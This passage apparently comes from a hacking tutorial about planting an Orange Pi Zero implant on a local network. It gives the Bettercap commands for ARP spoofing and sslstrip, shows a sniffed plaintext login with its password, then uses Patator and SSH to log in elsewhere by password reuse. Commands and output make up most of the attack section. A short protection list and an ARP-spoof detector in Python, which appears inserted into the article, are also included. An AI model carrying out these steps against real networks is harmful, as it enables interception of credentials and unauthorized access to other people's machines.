[21:18:57] [sys.log] [inf] caplets downloading caplets from https://github.com/bettercap/caplets/archive/master.zip ...
[21:19:03] [sys.log] [inf] caplets installing caplets to /usr/local/share/bettercap/caplets ...

Use caplets.show to view the installed caplets and their location on the operating system. You are encouraged to review the caplet files for brief descriptions of what each one does.

10.#.#.#/24 > 10.#.#.##  »  caplets.show

┌─────────────────────────────────────┬────────────────────────────────────────────────────────────────────────────┬────────┐
│                Name                 │                                    Path                                    │  Size  │
├─────────────────────────────────────┼────────────────────────────────────────────────────────────────────────────┼────────┤
│ ap                                  │ /usr/local/share/bettercap/caplets/ap.cap                                  │ 307 B  │
│ crypto-miner/crypto-miner           │ /usr/local/share/bettercap/caplets/crypto-miner/crypto-miner.cap           │ 666 B  │
│ download-autopwn/download-autopwn   │ /usr/local/share/bettercap/caplets/download-autopwn/download-autopwn.cap   │ 2.6 kB │
│ fb-phish/fb-phish                   │ /usr/local/share/bettercap/caplets/fb-phish/fb-phish.cap                   │ 140 B  │
│ gitspoof/gitspoof                   │ /usr/local/share/bettercap/caplets/gitspoof/gitspoof.cap                   │ 216 B  │
│ gps                                 │ /usr/local/share/bettercap/caplets/gps.cap                                 │ 109 B  │
│ hstshijack/hstshijack               │ /usr/local/share/bettercap/caplets/hstshijack/hstshijack.cap               │ 799 B  │
│ http-req-dump/http-req-dump         │ /usr/local/share/bettercap/caplets/http-req-dump/http-req-dump.cap         │ 591 B  │
│ http-ui                             │ /usr/local/share/bettercap/caplets/http-ui.cap                             │ 382 B  │
│ https-ui                            │ /usr/local/share/bettercap/caplets/https-ui.cap                            │ 661 B  │
│ jsinject/jsinject                   │ /usr/local/share/bettercap/caplets/jsinject/jsinject.cap                   │ 210 B  │
│ local-sniffer                       │ /usr/local/share/bettercap/caplets/local-sniffer.cap                       │ 244 B  │
│ login-manager-abuse/login-man-abuse │ /usr/local/share/bettercap/caplets/login-manager-abuse/login-man-abuse.cap │ 236 B  │
│ mana                                │ /usr/local/share/bettercap/caplets/mana.cap                                │ 61 B   │
│ massdeauth                          │ /usr/local/share/bettercap/caplets/massdeauth.cap                          │ 302 B  │
│ mitm6                               │ /usr/local/share/bettercap/caplets/mitm6.cap                               │ 551 B  │
│ netmon                              │ /usr/local/share/bettercap/caplets/netmon.cap                              │ 42 B   │
│ pita                                │ /usr/local/share/bettercap/caplets/pita.cap                                │ 900 B  │
│ proxy-script-test/proxy-script-test │ /usr/local/share/bettercap/caplets/proxy-script-test/proxy-script-test.cap │ 57 B   │
│ rogue-mysql-server                  │ /usr/local/share/bettercap/caplets/rogue-mysql-server.cap                  │ 501 B  │
│ rtfm/rtfm                           │ /usr/local/share/bettercap/caplets/rtfm/rtfm.cap                           │ 210 B  │
│ simple-passwords-sniffer            │ /usr/local/share/bettercap/caplets/simple-passwords-sniffer.cap            │ 131 B  │
│ tcp-req-dump/tcp-req-dump           │ /usr/local/share/bettercap/caplets/tcp-req-dump/tcp-req-dump.cap           │ 413 B  │
│ web-override/web-override           │ /usr/local/share/bettercap/caplets/web-override/web-override.cap           │ 254 B  │
└─────────────────────────────────────┴────────────────────────────────────────────────────────────────────────────┴────────┘

To quickly enumerate active hosts on the network, invoke the netmon caplet with the include command.

10.#.#.#/24 > 10.#.#.##  »  include netmon

┌───────────────┬───────────────────┬─────────────┬────────────────────────────┬───────┬────────┬──────────┐
│     IP ▴      │        MAC        │    Name     │           Vendor           │ Sent  │ Recvd  │   Seen   │
├───────────────┼───────────────────┼─────────────┼────────────────────────────┼───────┼────────┼──────────┤
│ 192.168.8.138 │ XX:XX:XX:XX:XX:XX │ eth0        │                            │ 0 B   │ 0 B    │ 21:18:37 │
│ 192.168.8.1   │ XX:XX:XX:XX:XX:XX │ gateway     │ Mediabridge Products, LLC. │ 19 kB │ 8.6 kB │ 21:18:37 │
│               │                   │             │                            │       │        │          │
│ 192.168.8.179 │ XX:XX:XX:XX:XX:XX │             │ Sony Corporation           │ 32 kB │ 128 kB │ 21:20:24 │
│ 192.168.8.193 │ XX:XX:XX:XX:XX:XX │ Windows 10  │                            │ 916 B │ 1.3 kB │ 21:20:20 │
└───────────────┴───────────────────┴─────────────┴────────────────────────────┴───────┴────────┴──────────┘

↑ 54 kB / ↓ 433 kB / 4310 pkts

Alternatively, traffic passing between devices on the network can be sniffed by running the following six commands in order.

10.#.#.#/24 > 10.#.#.##  »  set http.proxy.sslstrip true
10.#.#.#/24 > 10.#.#.##  »  set arp.spoof.internal true
10.#.#.#/24 > 10.#.#.##  »  set net.sniff.verbose false
10.#.#.#/24 > 10.#.#.##  »  net.sniff on
10.#.#.#/24 > 10.#.#.##  »  http.proxy on
10.#.#.#/24 > 10.#.#.##  »  arp.spoof on

Bettercap will begin to display a large amount of data passing over the network. Some servers and services on the network may not support HTTPS, or may not use it by default. These are prime targets for tools like Bettercap.
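The arp.spoof step above works because hosts accept whichever ARP reply arrived last, and with arp.spoof.internal set, one MAC ends up answering for the gateway and for other hosts at once. That same behaviour is what gives it away on a monitored host. The following is an added example, not code from the article or from Bettercap, that flags both symptoms from a stream of observed ARP replies; the replies are constructed, the gateway address is taken from the netmon table above, and the MAC addresses are invented.

```python
from collections import defaultdict

GATEWAY_IP = "192.168.8.1"  # gateway address shown in the netmon table

# Constructed ARP-reply observations: (time, sender IP, sender MAC).
# The first two are the real gateway and the Sony host; the last two are a
# hypothetical implant MAC answering for both of them (invented MACs).
SAMPLE_REPLIES = [
    ("21:18:37", "192.168.8.1",   "00:11:22:33:44:01"),
    ("21:18:37", "192.168.8.179", "00:11:22:33:44:02"),
    ("21:20:24", "192.168.8.1",   "00:11:22:33:44:03"),
    ("21:20:24", "192.168.8.179", "00:11:22:33:44:03"),
]


def detect_arp_spoof(replies, gateway_ip=GATEWAY_IP):
    """Return alerts for two ARP-spoofing symptoms: an IP (especially the
    gateway) changing MAC mid-session, and one MAC claiming several IPs.
    A replaced router or a host with IP aliases can also trigger these,
    so treat alerts as a prompt to inspect, not as proof."""
    ip_to_mac = {}
    mac_to_ips = defaultdict(set)
    alerts = []
    for ts, ip, mac in replies:
        mac = mac.lower()
        previous = ip_to_mac.get(ip)
        if previous is not None and previous != mac:
            kind = "gateway_mac_changed" if ip == gateway_ip else "host_mac_changed"
            alerts.append({"time": ts, "kind": kind, "ip": ip,
                           "old": previous, "new": mac})
        ip_to_mac[ip] = mac
        before = len(mac_to_ips[mac])
        mac_to_ips[mac].add(ip)
        # Alert only when the set of IPs claimed by this MAC actually grows.
        if len(mac_to_ips[mac]) > 1 and len(mac_to_ips[mac]) > before:
            alerts.append({"time": ts, "kind": "mac_claims_multiple_ips",
                           "mac": mac, "ips": sorted(mac_to_ips[mac])})
    return alerts


def spoofed_gateway(replies, gateway_ip=GATEWAY_IP):
    """True if the gateway's MAC changed during the observed replies."""
    return any(a["kind"] == "gateway_mac_changed"
               for a in detect_arp_spoof(replies, gateway_ip))


if __name__ == "__main__":
    for alert in detect_arp_spoof(SAMPLE_REPLIES):
        print(alert)
```

On a real host the observations would come from a packet capture of ARP replies rather than the constructed list.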

Below is an example of a POST request made by a user authenticating to a media server running on one of the network devices.

POST /media_server/Users/authenticatebyname HTTP/1.1
Host: 192.168.8.183:8096
Accept-Encoding: gzip, deflate
X-media-Authorization: MediaBrowser Device="Firefox", DeviceId="TW96aWxsYS81LjAgKFdpbmRvd3MgTlQgMTAuMDsgV2luNjQ7IHg2NDsgcnY6NjYuMCkgR2Vja28vMjAxMDAxMDEgRmlyZWZveC82Ni4wfDE1NTUzMTE3NzE5Mjg1", Version="4.0.2.0"
Content-Length: 46
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
Referer: http://192.168.8.183:8096/web/index.html
Content-Type: application/json
Origin: http://192.168.8.183:8096
Accept: application/json
Accept-Language: en-US,en;q=0.5

{
  "Username": "tokyoneon",
  "Pw": "secure_password-321"
}

Bettercap displays the username and password data found in the login request. These credentials can be used to pivot to other devices on the network, for example, the previously discovered SSH server on 192.168.8.183. Now that the attacker has some sense of the target's preferred username and password scheme, they can test the credentials against other services on the network.

root@orangepizero:~# cd /opt/patator/
root@orangepizero:/opt/patator# ./patator.py ssh_login host=192.168.8.183 port=22 user=tokyoneon password='secure_password-321' -t 1

INFO - code  size    time | candidate                          |   num | mesg
INFO - -----------------------------------------------------------------------------
INFO - 0     39     0.117 |                                    |     1 | SSH-2.0-OpenSSH_7.6p1 Ubuntu-4ubuntu0.3

INFO - Hits/Done/Skip/Fail/Size: 1/1/0/0/1, Avg: 0 r/s, Time: 0h 0m 1s

The Patator request didn't return an "Authentication failed" message this time. This is a pretty good indication the password is correct. The same username and password can be used to log into the SSH server for a password reuse attack.

root@orangepizero:/opt/patator# cd
root@orangepizero:~# ssh -p 22 tokyoneon@192.168.8.183

The authenticity of host '192.168.8.183 (192.168.8.183)' can't be established.
ECDSA key fingerprint is SHA256:3QmOhr8syz8l4HBWICG53DdVE2fStfHdO2Ri/nU4hBc.
Are you sure you want to continue connecting (yes/no)? yes

Welcome to Ubuntu 18.04.1 LTS (GNU/Linux 4.15.0-29-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

Last login: Mon Apr 15 07:27:14 2019 from 127.0.0.1

tokyoneon@ubuntu:~$

How to Protect Yourself Against Network Implant Attacks

  • Enable HTTPS: The media server on the network didn't support HTTPS. This allowed the attacker to observe the login credentials using Bettercap. The use of HTTPS and other encrypted protocols will go a long way in thwarting an attacker's ability to compromise the network further.
  • Use Password Managers: The attacker in this example was able to reuse the media server password on the SSH server. The use of a password manager would've helped prevent the attacker from gaining access to the Ubuntu machine. It's always a bad idea to reuse passwords across multiple online accounts, servers, and operating systems.
  • Disable DHCP: This attack relies on the router issuing an IP address to the Orange Pi Zero when it's implanted. Without an IP address, Tor won't be able to connect to the internet. This would hinder the attacker's ability to access the network remotely. Disabling DHCP will only create an obstacle for the attacker, however. It wouldn't be impossible to enumerate the IP address and netmask for a static connection. Furthermore, if the attacker is still in the area, they would be able to use the Orange Pi Zero's Wi-Fi hotspot to identify the IP and netmask scheme manually.
  • Be Alert: Be mindful of the people and devices authenticated to the router you're connecting to. It also doesn't hurt to inspect devices physically attached to the router occasionally. This is especially important for router administrators operating in public areas like coffee shops, hospitals, and libraries. Public networks like these are prime targets for hackers looking to compromise as many people and services as possible.

Setting up the Orange Pi Zero and performing these attacks on my test networks was a lot of fun. I highly encourage readers to give this kind of attack a try and deploy cheap SBCs during pentesting engagements.

Until next time, you can follow me on Twitter @tokyoneon_ and GitHub. And as always, leave a comment below or message me on Twitter if you have any questions.

Cover photo by tokyoneon/Null Byte
